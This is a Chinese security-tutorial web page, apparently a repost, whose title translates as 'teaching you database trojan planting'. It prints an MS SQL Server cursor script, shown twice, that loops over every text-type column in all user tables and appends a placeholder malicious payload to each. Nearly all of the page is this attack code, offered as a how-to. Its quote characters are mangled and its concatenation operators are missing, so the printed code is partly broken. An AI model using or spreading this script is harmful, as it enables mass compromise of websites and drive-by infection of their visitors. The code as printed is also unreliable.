您现在的位置是:网站首页> 编程资料编程资料
教你数据库挂马 _安全教程_网络安全_
2023-05-24
317人已围观
简介 教你数据库挂马 _安全教程_网络安全_
以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。
SQL语句如下:
用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
———————YD的分割——————————–
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’ @T ’] set [’ @C ’]=
rtrim(convert(varchar,[’ @C ’]))
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
———————YD的分割——————————–
SQL语句如下:
用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
———————YD的分割——————————–
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’ @T ’] set [’ @C ’]=
rtrim(convert(varchar,[’ @C ’]))
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
———————YD的分割——————————–
相关内容
- 大势至共享文件监控软件、共享文件权限管理软件主控端与客户端的连接设置方法详解_安全教程_网络安全_
- 基于Windows入门级IDS构建过程详述 _安全教程_网络安全_
- 为何黑客要挟制路由器DNS 用户该怎样实时发觉和防备方法_安全教程_网络安全_
- ASP搜索型注入 _安全教程_网络安全_
- Windows 0day EternalBlue(永恒之蓝)漏洞病毒预警及预防措施_安全教程_网络安全_
- 看黑客是如何黑了落伍者的(图) _安全教程_网络安全_
- [不断更新]"永恒之蓝"勒索病毒防护全攻略再也不用拔网线了_安全教程_网络安全_
- WordPress 2.6.1 SQL Column Truncation Vulnerability _安全教程_网络安全_
- 报名云栖大会成都峰会听阿里云首席安全研究员分享安全防护实践经验_安全教程_网络安全_
- 教你如何破别人的ASP木马密码 _安全教程_网络安全_